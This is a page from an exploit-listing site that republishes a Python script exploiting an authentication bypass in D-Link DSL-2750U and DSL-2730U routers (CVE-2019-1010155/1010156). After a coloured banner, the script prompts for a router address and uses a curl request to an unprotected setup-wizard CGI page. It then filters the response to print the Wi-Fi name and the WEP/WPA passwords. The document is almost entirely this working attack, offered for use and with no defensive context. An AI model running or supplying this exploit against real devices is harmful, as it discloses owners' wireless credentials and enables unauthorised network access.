Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020070098

Below is a copy:

D-Link DSL-2750U Wifi Password Disclosure
#!/usr/bin/env python
# -*- coding: utf-8 -*- 

import os
import subprocess

def banner():
    os.system("clear")
    print u"""\u001b[33;1m
                             
                     
                            
                                
                          
                           
    \u001b[32;1m      # Exploit Title: Setup Wizard Page Authentication Bypass {Wifi Password Disclosure}        
    \u001b[32;1m      # Exploit Author: Admin_JOKER(CVE-2019-1010155)(CVE-2019-1010156)
    \u001b[32;1m      # Exploit Work on GNU/Linux
    \u001b[37;1m      # Email: [email protected]
    \u001b[37;1m      # Date: 2018-08-23        
    \u001b[37;1m      # Category: Webapps
    \u001b[37;1m      # Vendor Homepage:https://www.dlink.com.sg/product/dsl-2750u-n300-wireless-adsl2-4-port-wi-fi-router/
    \u001b[31;1m      # Tested on: DSL-2750U / ME_1.03 ME_1.07 ME_1.09 ME_1.11 & IN_1.15
    \u001b[31;1m      # Tested on: DSL-2730U / ME_1.07
    \u001b[31;1m      # Firmware Version:  IN_1.15 and  All Older Firmware(1.0 Not work) (Fix in ME_1.15)
    \u001b[31;1m      # Video : https://youtu.be/iISdfFlghu8              
    \u001b[33;1m                                                       \u001b[0m
    """

def exploit():
    print(u"\u001b[31;1m(Default: 192.168.1.1:80)\u001b[0m")
    target = raw_input(u'\u001b[33;1mType Router [IP:PORT]: \u001b[0m')
    if target == '':
        target = '192.168.1.1:80'
    else:
        pass
    print (u'\u001b[32;1m')
    print (""),
    os.system("curl -s 'http://"+target+"/cgi-bin/webproc?getpage=html/index.html&errorpage=html/index.html&var:language=en_us&var:menu=setup&var:subpage=wizwl&var:page=wizard' | grep -e 'var wireless_name' -e 'var randomW' | sed -e 's/var wireless_name/Wifi Name/' -e 's/var randomWEPKey/WEP Password/' -e 's/var randomWPAKEY/WPA Password/' -e 's/;//'")
    print (u'\u001b[0m')

banner()
banner()
exploit()

Copyright ©2023 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.